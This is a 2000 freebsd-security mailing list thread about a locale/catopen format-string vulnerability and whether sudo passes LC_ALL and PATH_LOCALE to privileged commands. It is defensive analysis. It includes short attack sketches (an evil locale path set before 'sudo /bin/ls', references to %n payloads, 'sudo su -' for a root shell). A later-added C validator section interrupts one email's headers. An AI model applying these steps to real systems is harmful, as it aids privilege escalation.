Short answer: sort of, but only in certain third party applications (I don't know of any at the moment). The FreeBSD base system is not believed to be vulnerable.

Back on 05 Aug I committed a fix to -current for an exploitable buffer overflow in catopen(). This was merged to 4.1-STABLE on 22 August, because I got distracted and forgot about it :-( I'm still trying to get time to write an advisory.

A few weeks later, we were contacted by Ivan Arce of core-sdi about multi-vendor problems with locale functions - we weren't vulnerable to any of these mentioned.

During their testing, the glibc guys discovered a further problem wherein a setuid app could be told to look at a user-supplied file for catalog data, which could then be used to execute arbitrary code if the application is badly written and does not make use of the data correctly (this is a typical "missing format string" vulnerability). That one was fixed in -current on September 1, but that has not yet been merged. I only realised this vulnerability yesterday - I'll get it merged ASAP.
HOWEVER: no program shipped in the FreeBSD base system is believed to be vulnerable to either of these problems. They both affect catopen(), and we don't use that function at all except in tcsh, which is non-privileged. We don't even have any code which has the required bug needed to exploit the second problem (assuming the first condition were true) - I did a big sweep a month or two back for all such instances of incorrect format string handling, and there were none in privileged programs (and few such real bugs in other programs).

I don't know of any ports which install setugid binaries and use catopen(). If they do, they are vulnerable. If not, you have nothing to worry about.

I'm going to try and get the advisory out this week which will include a scanning utility to check vulnerability of ports.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Thu Sep 7 3:41:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D3C6B37B422; Thu, 7 Sep 2000 03:41:13 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id DAA02056; Thu, 7 Sep 2000 03:41:13 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 03:41:13 -0700 (PDT)
From: Kris Kennaway
To: "Vladimir Mencl, MK, susSED"
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Vladimir Mencl, MK, susSED wrote:

> However, I think that FreeBSD is vulnerable with the sudo port
> installed.
>
> Although sudo discards some dangerous environment variables (LD_LIBRARY_PATH)
> it does pass the LC_ALL, PATH_LOCALE variables through.
>
> Therefore, I believe, that any user allowed to use sudo to execute a
> program with elevated privileges, can potentially exploit this
> vulnerability.
>
> So, at least a port security advisory should be issued, and possibly the
> sudo port patched to discard locale-specific environment variables.

Thanks for the report. I'll look into it and issue a ports advisory if necessary (this seems to be a sudo problem, not a FreeBSD one - PATH_LOCALE is ignored if setugid, and at first glance LC_ALL is okay too, although I need to check that properly)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Thu Sep 7 3:46:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 558D137B423; Thu, 7 Sep 2000 03:46:36 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id DAA02738; Thu, 7 Sep 2000 03:46:36 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 03:46:35 -0700 (PDT)
From: Kris Kennaway
To: "Vladimir Mencl, MK, susSED"
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Kris Kennaway wrote:

> Thanks for the report. I'll look into it and issue a ports advisory if
> necessary (this seems to be a sudo problem, not a FreeBSD one -
> PATH_LOCALE is ignored if setugid, and at first glance LC_ALL is okay too,
> although I need to check that properly)

Which is to say, there could possibly be problems with certain vulnerable *non*-setugid apps launched by sudo, i.e. the user could execute other arbitrary commands as whatever user they are sudo'ing to. But I need to check whether this is in fact the case.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Thu Sep 7 4: 0:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 9C02737B423; Thu, 7 Sep 2000 04:00:11 -0700 (PDT)
Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id NAA26236; Thu, 7 Sep 2000 13:00:10 +0200 (MET DST)
Date: Thu, 7 Sep 2000 13:00:10 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: Kris Kennaway
Cc: Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Kris Kennaway wrote:

> On Thu, 7 Sep 2000, Kris Kennaway wrote:
>
> > Thanks for the report. I'll look into it and issue a ports advisory if
> > necessary (this seems to be a sudo problem, not a FreeBSD one -
> > PATH_LOCALE is ignored if setugid, and at first glance LC_ALL is okay too,
> > although I need to check that properly)
>
> Which is to say, there could possibly be problems with certain vulnerable
> *non*-setugid apps launched by sudo, i.e. the user could execute other
> arbitrary commands as whatever user they are sudo'ing to. But I need to
> check whether this is in fact the case.

I did make some tests before posting my initial message.

I allowed a user to run '/bin/ls -l /' as root - a simple test.

/bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a localized date/time formatting) even when invoked via sudo. That would be sufficient to use the vulnerability, I suppose.

In my opinion, the cause of the vulnerability is in the conjunction of two conditions -

1. the "general misconception of locales", allowing user to tweak the behavior of programs via locales, which has been solved in FreeBSD, and
2. sudo not taking into account the fact, that FreeBSD has decided to propagate custom locales to programs running with upgraded privileges.
Vladimir Mencl

From owner-freebsd-security Thu Sep 7 7:54:50 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 8B0A937B424 for ; Thu, 7 Sep 2000 07:54:44 -0700 (PDT)
Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id QAA29101; Thu, 7 Sep 2000 16:54:41 +0200 (MET DST)
Date: Thu, 7 Sep 2000 16:54:41 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: mike.sellenschuetter@bankofamerica.com
Cc: security@freebsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <86256953.004E2938.00@dalnsd40.bankofamerica.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000 mike.sellenschuetter@bankofamerica.com wrote:

> Hi,
>
> I am a learning FreeBSD systems administrator so my knowledge level of Unix is
> not at your level. However, I have installed Sudo on the system that I
> maintain, and I don't fully understand your concern. I agree that Sudo is a
> nice tool. And although one can configure Sudo to prevent users assigned to a
> particular Sudo group from executing certain commands, it is my understanding
> that when a user executes a command with Sudo, his or her real and effective UID
> and GID becomes zero or root for that command. This behavior alone creates many
> concerns because a user can exploit this to gain root access.
>
> Within the sudoers file, I prevent a user from spawning another shell with Sudo;
> however, I can not monitor everyone's home directory for programs that when
> executed with Sudo will spawn another shell as root. While that shell is
> active, this user owns my system, and I have to assume a certain level of trust
> with the users that I have given Sudo privileges. It seems to me with my
> limited knowledge that the below concern is minimal compared to the other
> avenues available to users who have Sudo privileges.
>
> Am I missing something? This is probably the case so can you help me to
> understand your concern?

In a situation like this (when you give "nearly-the-root-shell" to the users), and your relation with the users is based on trust, this issue is not to be concerned.
What I was concerned about is, when only some very limited commands are accessible via sudo, that these commands might be used to exploit the locale vulnerability.

I'm myself using sudo only to run the "/sbin/mount /cdrom" command (and umount). The mount and umount commands do not use any locales, seems to me, however other commands might.

As an example, I used the /bin/ls command - imagine, that I wish to allow some users to list an inaccessible directory, and I decide to use sudo for this operation.

If I add the "ALL ALL = NOPASSWD: /bin/ls -l /root/.ssh" line to the sudoers file (just to allow anybody to check the root's .ssh directory - a silly example, but I cannot find out any better now), /bin/ls can be exploited.

If a malicious user types

    export PATH_LOCALE=/tmp/my_evil_locales/
    export LC_ALL=en_evil_locale
    sudo /bin/ls -l /root/.ssh

this user might possibly cause ls to execute code forged in the evil locale.

The point is, that this would not work for setuid binaries on FreeBSD, because setuid binaries ignore the locale settings on FreeBSD. However, the authors of the sudo program were not aware of the danger the locale environment variables present, and are passing these settings to the programs executed.

The settings should be blocked the same way LD_* variables are blocked. LD_* variables are ignored by a setuid program, because this program is aware of its setuid-ness. However, sudo, which masks the setuidness, has to protect the programs from these variables, and should do the same for locale setting environment variables.

Can anybody comment, whether there are any other environment variables harmful to setuid programs (and ignored by them), which should be blocked by sudo too, besides the LD_* and LC_* ?

And what's the status of other sudo-like ports - the su2 and super ?
Vladimir Mencl

From owner-freebsd-security Thu Sep 7 9: 4:36 2000
Delivered-To: freebsd-security@freebsd.org
Received: from jake.akitanet.co.uk (jake.akitanet.co.uk [212.1.130.131]) by hub.freebsd.org (Postfix) with ESMTP id E935437B422 for ; Thu, 7 Sep 2000 09:04:31 -0700 (PDT)
Received: from ppp-10a-93.3com.telinco.net ([212.159.146.93] helo=foo.akitanet.co.uk) by jake.akitanet.co.uk with smtp (Exim 3.13 #3) id 13X49Q-000Fgq-00; Thu, 07 Sep 2000 17:03:44 +0100
From: Paul Robinson
Organization: Akita Ltd.
To: "Vladimir Mencl, MK, susSED" , mike.sellenschuetter@bankofamerica.com
Subject: Re: UNIX locale format string vulnerability (fwd)
Date: Thu, 7 Sep 2000 17:01:54 +0100
X-Mailer: KMail [version 1.0.28]
Content-Type: text/plain; charset="US-ASCII"
Cc: security@freebsd.org
References:
In-Reply-To:
MIME-Version: 1.0
Message-Id: <00090717035304.31820@foo.akitanet.co.uk>
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 07 Sep 2000, Vladimir Mencl, MK, susSED wrote:

> What I was concerned about is, when only some very limited commands are
> accessible via sudo, that these commands might be used to exploit the
> locale vulnerability.

Although a valid point, I'm amazed that on 99.95% of machines with sudo installed I can walk up to it and type:

    sudo su -

And get root shell straight away. sudo /bin/sh is always a good one as well. I think the education needs to start at the basic level first, because I've yet to see anybody setup sudo correctly the first time around.

--
Paul Robinson

From owner-freebsd-security Thu Sep 7 9:16:10 2000
Delivered-To: freebsd-security@freebsd.org
Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (Postfix) with ESMTP id 7806437B423 for ; Thu, 7 Sep 2000 09:16:06 -0700 (PDT)
Received: (from smap@localhost) by whistle.com (8.10.0/8.10.0) id e87GG6320742 for ; Thu, 7 Sep 2000 09:16:06 -0700 (PDT)
Received: from pau-amma.whistle.com( 207.76.205.64) by whistle.com via smap (V2.0) id xma020740; Thu, 7 Sep 2000 09:15:50 -0700
Received: (from dhw@localhost) by pau-amma.whistle.com (8.9.3/8.9.3) id JAA06923 for security@FreeBSD.ORG; Thu, 7 Sep 2000 09:15:50 -0700 (PDT) (envelope-from dhw)
Date: Thu, 7 Sep 2000 09:15:50 -0700 (PDT)
From: David Wolfskill
Message-Id: <200009071615.JAA06923@pau-amma.whistle.com>
Subject: Re: UNIX locale format string vulnerability (fwd)
Cc: security@FreeBSD.ORG
In-Reply-To: <00090717035304.31820@foo.akitanet.co.uk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
>From: Paul Robinson
>To: "Vladimir Mencl, MK, susSED" ,
>Date: Thu, 7 Sep 2000 17:01:54 +0100

>Although a valid point, I'm amazed that on 99.95% of machines with sudo
>installed I can walk up to it and type:

>sudo su -

>And get root shell straight away. sudo /bin/sh is always a good one as well. I
>think the education needs to start at the basic level first, because I've yet to
>see anybody setup sudo correctly the first time around.

With respect, what you observe may well be "correctly" for some of the installations in question. "What is correct" is a highly context-sensitive matter, and trying to apply the criteria for one set of circumstances to an installation that is in a different set of circumstances is not always useful.

This is not to say that folks do not make mistakes; we're all human. But in practice, there are trade-offs made in implementing security.

Cheers,
david

--
David Wolfskill dhw@whistle.com UNIX System Administrator
Desk: 650/577-7158 TIE: 8/499-7158 Cell: 650/759-0823

From owner-freebsd-security Thu Sep 7 9:18: 9 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id E6C6337B422; Thu, 7 Sep 2000 09:18:04 -0700 (PDT)
Received: from billy-club.village.org (billy-club.village.org [10.0.0.3]) by rover.village.org (8.9.3/8.9.3) with ESMTP id KAA37265; Thu, 7 Sep 2000 10:17:57 -0600 (MDT) (envelope-from imp@billy-club.village.org)
Received: from billy-club.village.org (localhost [127.0.0.1]) by billy-club.village.org (8.11.0/8.8.3) with ESMTP id e87GIOG16223; Thu, 7 Sep 2000 10:18:24 -0600 (MDT)
Message-Id: <200009071618.e87GIOG16223@billy-club.village.org>
To: "Vladimir Mencl, MK, susSED"
Subject: Re: UNIX locale format string vulnerability (fwd)
Cc: Kris Kennaway , Cy Schubert - ITSD Open Systems Group , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org
In-reply-to: Your message of "Thu, 07 Sep 2000 13:00:10 +0200."
References:
Date: Thu, 07 Sep 2000 10:18:24 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message "Vladimir Mencl, MK, susSED" writes:
: I allowed a user to run '/bin/ls -l /' as root - a simple test.
:
: /bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a
: localized date/time formatting) even when invoked via
: sudo. That would be sufficient to use the vulnerability, I suppose.

Did it allow you to read a file in PATH_LOCALE that otherwise it wouldn't have? Are there buffer overflows that this could exploit? Are there information leaks that you could force with this? What, specifically, is the problem here?

: In my opinion, the cause of the vulnerability is in the conjunction of
: two conditions -
:
: 1. the "general misconception of locales", allowing user to tweak the
: behavior of programs via locales, which has been solved in FreeBSD, and
: 2. sudo not taking into account the fact, that FreeBSD has decided to
: propagate custom locales to programs running with upgraded privileges.

sudo was designed to be fairly permissive in many ways. The authors of sudo explicitly realized that there may be loopholes in the command set that you give users and that you must trust honest users to stay honest with it.

Warner

From owner-freebsd-security Thu Sep 7 13:48:27 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nenya.ms.mff.cuni.cz (nenya.ms.mff.cuni.cz [195.113.17.179]) by hub.freebsd.org (Postfix) with ESMTP id 6EC3B37B423 for ; Thu, 7 Sep 2000 13:48:23 -0700 (PDT)
Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.3+Sun/8.9.1) with ESMTP id WAA00866; Thu, 7 Sep 2000 22:48:08 +0200 (MET DST)
Date: Thu, 7 Sep 2000 22:48:08 +0200 (MET DST)
From: "Vladimir Mencl, MK, susSED"
To: Warner Losh
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <200009071618.e87GIOG16223@billy-club.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Warner Losh wrote:

> In message "Vladimir Mencl, MK, susSED" writes:
> : I allowed a user to run '/bin/ls -l /' as root - a simple test.
> :
> : /bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a
> : localized date/time formatting) even when invoked via
> : sudo. That would be sufficient to use the vulnerability, I suppose.
>
> Did it allow you to read a file in PATH_LOCALE that otherwise it
> wouldn't have? Are there buffer overflows that this could exploit?
> Are there information leaks that you could force with this? What,
> specifically, is the problem here?

I have not tried reading a file I would not have permission, that is not something I could use the locales for - unless the file was in the format used by locales. I do not think that this mechanism could be used for arbitrary files.

The point is, that if I submitted an evil locale - especially, a locale containing formatting strings with "%n"s, and generally with a lot of weird formatting characters, I could potentially make that sudo-run program execute arbitrary code provided by me - that's what the original bugtraq advisory was about, and what I claim that with sudo can be exploited on FreeBSD too.

However, the vulnerability is not a buffer overflow, it's only a not-properly-checked format string, and creating an exploit only using "%n"s would be a really ugly hard work, and I would be trying to avoid doing it at any cost....
Best regards and good night

Vladimir Mencl

From owner-freebsd-security Thu Sep 7 14: 0:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A9AF337B423 for ; Thu, 7 Sep 2000 14:00:12 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA38874; Thu, 7 Sep 2000 15:00:05 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA05785; Thu, 7 Sep 2000 14:59:55 -0600 (MDT)
Message-Id: <200009072059.OAA05785@harmony.village.org>
To: "Vladimir Mencl, MK, susSED"
Subject: Re: UNIX locale format string vulnerability (fwd)
Cc: freebsd-security@FreeBSD.ORG, millert@openbsd.org
In-reply-to: Your message of "Thu, 07 Sep 2000 22:48:08 +0200."
References:
Date: Thu, 07 Sep 2000 14:59:55 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message "Vladimir Mencl, MK, susSED" writes:
: The point is, that if I submitted an evil locale - especially, a locale
: containing formatting strings with "%n"s, and generally with a lot of
: weird formatting characters, I could potentially make that sudo-run
: program execute arbitrary code provided by me - that's what the original
: bugtraq advisory was about, and what I claim that with sudo can be
: exploited on FreeBSD too.

Ah. I see your point. This is a generic problem then. However, it is a problem with sudo (which is why I keep adding millert back to the list of CC'd people). It likely isn't a big problem for reasons I explained earlier. sudo isn't intended to be a bulletproof way to give users the ability to execute N listed commands, as many of those may have sub commands. Todd can take a stand on this more accurately.

: However, the vulnerability is not a buffer overflow, it's only a
: not-properly-checked format string, and creating an exploit only using
: "%n"s would be a really ugly hard work, and I would be trying to avoid
: doing it at any cost....

Hmmmm. Maybe this could be done. The proper fix isn't to fix sudo, of course, but rather to ensure that sufficient arguments are present to consume the % chars and if not to not do anything.
Warner

From owner-freebsd-security Thu Sep 7 14:19: 9 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2CE1B37B422; Thu, 7 Sep 2000 14:19:06 -0700 (PDT)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id OAA12952; Thu, 7 Sep 2000 14:19:06 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Thu, 7 Sep 2000 14:19:06 -0700 (PDT)
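The bug class Kris describes earlier in the thread (a message fetched from a user-controllable catalog used directly as the printf format) and the fix Warner suggests just above (make sure the arguments actually present can consume every '%' before the string is used) can be put into a few lines of C. What follows is an added illustration, not code from FreeBSD, sudo or anyone in this thread: fmt_signature, choose_format and format_message are names chosen here, and the catalog strings are constructed inputs. The checker reduces a format to the list of arguments it consumes and only lets a catalog string replace the built-in one when the two lists are identical; %n, positional arguments and truncated specs are refused outright.

```c
#include <stdio.h>
#include <string.h>

/*
 * Reduce a printf-style format to the sequence of arguments it consumes:
 * one character per conversion ("s", "d", ...) plus '*' for every width or
 * precision taken from the argument list.  "%%" consumes nothing.
 *
 * Returns the number of characters written to sig, or -1 when the format is
 * truncated, uses %n (a write to memory we never accept from catalog text),
 * uses positional "%1$s" arguments (not modelled here), or is otherwise
 * unknown to this checker.
 */
int fmt_signature(const char *fmt, char *sig, size_t siglen)
{
    size_t n = 0;
    const char *p = fmt;

    while (*p != '\0') {
        if (*p++ != '%')
            continue;
        if (*p == '%') {                 /* "%%": literal percent sign */
            p++;
            continue;
        }
        while (*p != '\0' && strchr("-+ #0'", *p) != NULL)   /* flags */
            p++;
        if (*p == '*') {                                     /* width from args */
            if (n + 1 >= siglen) return -1;
            sig[n++] = '*';
            p++;
        } else {
            while (*p >= '0' && *p <= '9')
                p++;
        }
        if (*p == '.') {                                     /* precision */
            p++;
            if (*p == '*') {
                if (n + 1 >= siglen) return -1;
                sig[n++] = '*';
                p++;
            } else {
                while (*p >= '0' && *p <= '9')
                    p++;
            }
        }
        while (*p != '\0' && strchr("hlLqjzt", *p) != NULL)  /* length modifiers */
            p++;
        if (*p == '\0' || strchr("diouxXeEfFgGaAcsp", *p) == NULL)
            return -1;                   /* truncated, %n, "$", or unknown */
        if (n + 1 >= siglen) return -1;
        sig[n++] = *p++;
    }
    sig[n] = '\0';
    return (int)n;
}

/*
 * Use the catalog's text only if it consumes exactly the argument list the
 * compiled-in default does; otherwise fall back to the default.
 */
const char *choose_format(const char *builtin, const char *from_catalog)
{
    char want[32], got[32];

    if (from_catalog == NULL)
        return builtin;
    if (fmt_signature(builtin, want, sizeof want) < 0)
        return builtin;                  /* programmer error in the default */
    if (fmt_signature(from_catalog, got, sizeof got) < 0)
        return builtin;                  /* %n, junk or truncated: rejected */
    return strcmp(want, got) == 0 ? from_catalog : builtin;
}

/*
 * Vulnerable shape, for contrast (not compiled here):
 *     msg = catgets(cat, 1, 1, "cannot open %s\n");
 *     printf(msg);              <- catalog text IS the format string
 * Hardened shape: validate the catalog text against the default it replaces,
 * then use it with the single argument the default expects.
 */
int format_message(char *out, size_t outlen, const char *builtin,
                   const char *from_catalog, const char *path)
{
    const char *fmt = choose_format(builtin, from_catalog);
    return snprintf(out, outlen, fmt, path);
}

int main(void)
{
    char out[128];

    /* Constructed inputs: a legitimate translation and a hostile catalog entry. */
    format_message(out, sizeof out, "cannot open %s\n", "impossible d'ouvrir %s\n", "/etc/motd");
    fputs(out, stdout);
    format_message(out, sizeof out, "cannot open %s\n", "%s %s %n", "/etc/motd");
    fputs(out, stdout);                  /* falls back to the built-in text */
    return 0;
}
```

The same signature check can be run once over a whole catalog at load time, which is closer to the "scanning utility" Kris mentions than to a per-call fix; either way, the rule is that text chosen by the caller's environment never decides how many arguments printf reads.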
From: Kris Kennaway
To: Warner Losh
Cc: "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-Reply-To: <200009071618.e87GIOG16223@billy-club.village.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 7 Sep 2000, Warner Losh wrote:

> In message "Vladimir Mencl, MK, susSED" writes:
> : I allowed a user to run '/bin/ls -l /' as root - a simple test.
> :
> : /bin/ls did respond to both LC_ALL and PATH_LOCALE (by providing a
> : localized date/time formatting) even when invoked via
> : sudo. That would be sufficient to use the vulnerability, I suppose.
>
> Did it allow you to read a file in PATH_LOCALE that otherwise it
> wouldn't have? Are there buffer overflows that this could exploit?
> Are there infomation leaks that you could force with this? What,
> specifically, is the problem here?

If a program contains format string vulnerabilities which are used in conjunction with retrieved locale data then they can be exploited. I don't believe we have any more of these bugs in the base system as of 4.1, but some ports certainly do.

It may also be possible to read bits of an arbitrary file accessible to that user which would be displayed where the localized text is used, although I don't know how much sanity checking the locale functions do of their file input (i.e. whether a malformed file will be rejected with an error message, or if it will still be interpreted somehow and spat out)

Again, the problem here is with sudo, not with something that comes in FreeBSD.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Thu Sep 7 14:27:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from xerxes.courtesan.com (64-6-178-150.den1.phoenixdsl.net [64.6.178.150]) by hub.freebsd.org (Postfix) with ESMTP id 97E3B37B422; Thu, 7 Sep 2000 14:27:11 -0700 (PDT)
Received: from xerxes.courtesan.com (millert@localhost) by xerxes.courtesan.com (8.10.1/8.10.1) with ESMTP id e87LQuE12710; Thu, 7 Sep 2000 15:26:57 -0600 (MDT)
Message-Id: <200009072126.e87LQuE12710@xerxes.courtesan.com>
To: Kris Kennaway
Cc: Warner Losh , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
In-reply-to: Your message of "Thu, 07 Sep 2000 14:19:06 PDT."
References:
Date: Thu, 07 Sep 2000 15:26:56 -0600
From: "Todd C. Miller"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message so spake Kris Kennaway (kris):

> Again, the problem here is with sudo, not with something that comes in
> FreeBSD.

How is this a sudo problem? Do you expect sudo to strip away the NLS env vars for you? This would not be unprecedented, as sudo already strips out LD_* and friends but breaking locales seems a bit dodgy.

As I haven't seen the entire thread I'm clearly missing some info...

- todd

From owner-freebsd-security Thu Sep 7 14:33:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id C2ECE37B422; Thu, 7 Sep 2000 14:33:09 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA39071; Thu, 7 Sep 2000 15:33:06 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA06187; Thu, 7 Sep 2000 15:32:56 -0600 (MDT)
Message-Id: <200009072132.PAA06187@harmony.village.org>
To: "Todd C. Miller"
Subject: Re: UNIX locale format string vulnerability (fwd)
Cc: Kris Kennaway , "Vladimir Mencl, MK, susSED" , freebsd-security@FreeBSD.org, security-officer@FreeBSD.org, millert@openbsd.org
In-reply-to: Your message of "Thu, 07 Sep 2000 15:26:56 MDT." <200009072126.e87LQuE12710@xerxes.courtesan.com>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com>
Date: Thu, 07 Sep 2000 15:32:56 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <200009072126.e87LQuE12710@xerxes.courtesan.com> "Todd C. Miller" writes:
: In message
: so spake Kris Kennaway (kris):
:
: > Again, the problem here is with sudo, not with something that comes in
: > FreeBSD.
:
: How is this a sudo problem? Do you expect sudo to strip away the NLS
: env vars for you? This would not be unprecedented, as sudo already
: strips out LD_* and friends but breaking locales seems a bit dodgy.
:
: As I haven't seen the entire thread I'm clearly missing some info...

That's why I asked for more specific details... So far I've not seen
any.

He's basically worried that someone could use the LC_* variables to
exploit bugs in the locale code's lack of checking of %n arguments. e.g.

	setenv LOCALE_PATH /my/evil/stuff
	setenv LC_LANG "my_Evil"
	sudo ls

It seems like a longshot to me, or I misunderstand something.

Warner

From owner-freebsd-security Thu Sep 7 14:36:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 754A937B42C; Thu, 7 Sep 2000 14:36:39 -0700 (PDT)
Received: (from ache@localhost) by nagual.pp.ru (8.11.0/8.11.0) id e87La0919181; Fri, 8 Sep 2000 01:36:00 +0400 (MSD) (envelope-from ache)
Date: Fri, 8 Sep 2000 01:35:57 +0400
From: "Andrey A. Chernov"
To: Warner Losh
Cc: "Todd C. Miller", Kris Kennaway, "Vladimir Mencl, MK, susSED", freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG, millert@openbsd.org
Subject: Re: UNIX locale format string vulnerability (fwd)
Message-ID: <20000908013556.A19114@nagual.pp.ru>
References: <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072126.e87LQuE12710@xerxes.courtesan.com> <200009072132.PAA06187@harmony.village.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200009072132.PAA06187@harmony.village.org>; from imp@village.org on Thu, Sep 07, 2000 at 03:32:56PM -0600
Organization: Biomechanoid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 07, 2000 at 03:32:56PM -0600, Warner Losh wrote:
> : How is this a sudo problem? Do you expect sudo to strip away the NLS
> : env vars for you? This would not be unprecedented, as sudo already
> : strips out LD_* and friends but breaking locales seems a bit dodgy.
> :
> : As I haven't seen the entire thread I'm clearly missing some info...
>
